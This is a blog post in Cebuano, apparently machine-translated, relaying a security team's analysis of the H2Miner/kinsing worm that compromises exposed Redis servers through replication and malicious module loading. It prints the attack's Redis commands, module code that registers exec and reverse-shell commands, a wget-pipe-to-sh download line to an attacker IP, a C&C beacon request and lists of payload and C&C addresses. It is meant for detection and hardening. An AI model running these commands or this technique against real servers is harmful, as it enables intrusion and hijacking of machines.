ProHoster > Блог > Pagdumala > Usa ka bag-ong outbreak sa H2Miner worm ang nadiskobrehan nga nagpahimulos sa Redis RCE

Usa ka bag-ong outbreak sa H2Miner worm ang nadiskobrehan nga nagpahimulos sa Redis RCE

Usa ka adlaw ang milabay, usa sa akong mga server sa proyekto giatake sa usa ka susama nga wati. Sa pagpangita sa tubag sa pangutana nga "unsa kadto?" Nakakita kog maayo nga artikulo sa Alibaba Cloud Security team. Tungod kay wala nako makita kini nga artikulo sa Habré, nakahukom ko nga hubaron kini labi na alang kanimo <3

entry

Bag-ohay lang, ang grupo sa seguridad sa Alibaba Cloud nakadiskubre sa usa ka kalit nga pagbuto sa H2Miner. Kini nga matang sa malisyoso nga worm naggamit sa kakulang sa pagtugot o huyang nga mga password alang sa Redis isip mga ganghaan sa imong mga sistema, pagkahuman gi-synchronize niini ang kaugalingon nga malisyoso nga module sa ulipon pinaagi sa pag-synchronize sa master-slave ug sa katapusan gi-download kini nga malisyoso nga module sa giatake nga makina ug gipatuman ang malisyoso. mga instruksyon.

Kaniadto, ang mga pag-atake sa imong mga sistema sa panguna gihimo gamit ang usa ka pamaagi nga naglambigit sa mga naka-iskedyul nga buluhaton o mga yawe sa SSH nga gisulat sa imong makina pagkahuman naka-log in ang tig-atake sa Redis. Maayo na lang, kini nga pamaagi dili magamit kanunay tungod sa mga problema sa pagkontrol sa pagtugot o tungod sa lainlaing mga bersyon sa sistema. Bisan pa, kini nga pamaagi sa pagkarga sa usa ka malisyoso nga module mahimong direkta nga magpatuman sa mga mando sa tig-atake o makakuha og access sa kabhang, nga delikado alang sa imong sistema.

Tungod sa kadaghan sa mga server sa Redis nga gi-host sa Internet (halos 1 milyon), ang grupo sa seguridad sa Alibaba Cloud, ingon usa ka mahigalaon nga pahinumdom, nagrekomenda nga dili ipaambit sa mga tiggamit ang Redis online ug kanunay nga susihon ang kalig-on sa ilang mga password ug kung sila nakompromiso. dali nga pagpili.

H2Miner

Ang H2Miner usa ka botnet sa pagmina alang sa mga sistema nga nakabase sa Linux nga mahimong mosulong sa imong sistema sa lainlaing mga paagi, lakip ang kakulang sa pagtugot sa Hadoop yarn, Docker, ug Redis remote command execution (RCE) nga mga kahuyangan. Ang usa ka botnet naglihok pinaagi sa pag-download sa mga malisyosong script ug malware aron sa pagmina sa imong data, pagpalapad sa pag-atake sa horizontally, ug pagpadayon sa command and control (C&C) nga komunikasyon.

Redis RCE

Ang kahibalo bahin niini nga hilisgutan gipaambit ni Pavel Toporkov sa ZeroNights 2018. Human sa bersyon 4.0, gisuportahan ni Redis ang usa ka plug-in loading nga bahin nga naghatag sa mga tiggamit og katakus sa pag-load aron ang mga file giipon sa C sa Redis aron ipatuman ang piho nga mga mando sa Redis. Kini nga function, bisan pa mapuslanon, adunay usa ka kahuyang diin, sa master-slave mode, ang mga file mahimong i-synchronize sa ulipon pinaagi sa fullresync mode. Mahimo kini gamiton sa usa ka tig-atake aron mabalhin ang malisyoso nga mga file. Human makompleto ang pagbalhin, ikarga sa mga tig-atake ang module ngadto sa giatake nga Redis nga pananglitan ug ipatuman ang bisan unsang sugo.

Pagtuki sa Malware Worm

Bag-ohay lang, nadiskobrehan sa grupo sa seguridad sa Alibaba Cloud nga ang gidak-on sa H2Miner malisyoso nga grupo sa minero kalit nga miuswag pag-ayo. Sumala sa pagtuki, ang kinatibuk-ang proseso sa panghitabo sa pag-atake mao ang mosunod:

Usa ka bag-ong outbreak sa H2Miner worm ang nadiskobrehan nga nagpahimulos sa Redis RCE

Gigamit sa H2Miner ang RCE Redis alang sa usa ka hingpit nga pag-atake. Una nga giatake sa mga tig-atake ang wala’y proteksyon nga mga server sa Redis o mga server nga adunay huyang nga mga password.

Unya gigamit nila ang mando config set dbfilename red2.so aron usbon ang ngalan sa file. Pagkahuman niini, gipatuman sa mga tig-atake ang mando slaveof aron itakda ang master-slave replication host address.

Kung ang giatake nga pananglitan sa Redis nagtukod usa ka koneksyon sa master-slave sa malisyosong Redis nga gipanag-iya sa tig-atake, ipadala sa tig-atake ang nataptan nga module gamit ang fullresync nga mando aron ma-synchronize ang mga file. Ang red2.so file unya ma-download sa giatake nga makina. Gigamit dayon sa mga tig-atake ang ./red2.so loading module aron makarga kini nga file. Ang module mahimong magpatuman sa mga mando gikan sa usa ka tig-atake o magsugod sa usa ka baligtad nga koneksyon (backdoor) aron makakuha og access sa giatake nga makina.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

Human sa pagpatuman sa usa ka malisyosong sugo sama sa / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, i-reset sa tig-atake ang backup nga ngalan sa file ug idiskarga ang module sa sistema aron malimpyohan ang mga bakas. Bisan pa, ang red2.so file magpabilin gihapon sa giatake nga makina. Gitambagan ang mga tiggamit nga hatagan pagtagad ang presensya sa ingon usa ka kadudahang file sa folder sa ilang pananglitan sa Redis.

Dugang pa sa pagpatay sa pipila ka mga malisyosong proseso sa pagpangawat sa mga kahinguhaan, ang tig-atake misunod sa usa ka malisyoso nga script pinaagi sa pag-download ug pag-execute sa malisyosong binary files ngadto sa 142.44.191.122/kinsing. Kini nagpasabut nga ang ngalan sa proseso o ngalan sa direktoryo nga adunay sulud nga kinsing sa host mahimong magpakita nga kana nga makina nataptan sa kini nga virus.

Sumala sa reverse engineering nga mga resulta, ang malware nag-una sa pagbuhat sa mosunod nga mga gimbuhaton:

  • Pag-upload sa mga file ug pagpatuman niini
  • Pagmina
  • Pagmentinar sa komunikasyon sa C&C ug pagpatuman sa mga sugo sa tig-atake

Usa ka bag-ong outbreak sa H2Miner worm ang nadiskobrehan nga nagpahimulos sa Redis RCE

Gamita ang masscan para sa external scanning aron mapadako ang imong impluwensya. Dugang pa, ang IP address sa C&C server hard-coded sa programa, ug ang giatake nga host makigkomunikar sa C&C communication server gamit ang HTTP requests, diin ang zombie (compromised server) nga impormasyon giila sa HTTP header.

Usa ka bag-ong outbreak sa H2Miner worm ang nadiskobrehan nga nagpahimulos sa Redis RCE

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Uban pang mga pamaagi sa pag-atake

Usa ka bag-ong outbreak sa H2Miner worm ang nadiskobrehan nga nagpahimulos sa Redis RCE

Mga adres ug mga link nga gigamit sa ulod

/kinsing

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Tip

Una, ang Redis kinahanglan dili ma-access gikan sa Internet ug kinahanglan nga mapanalipdan sa usa ka lig-on nga password. Importante usab nga susihon sa mga kliyente nga walay red2.so nga file sa direktoryo sa Redis ug nga walay "kinsing" sa file/process name sa host.

Source: www.habr.com

Idugang sa usa ka comment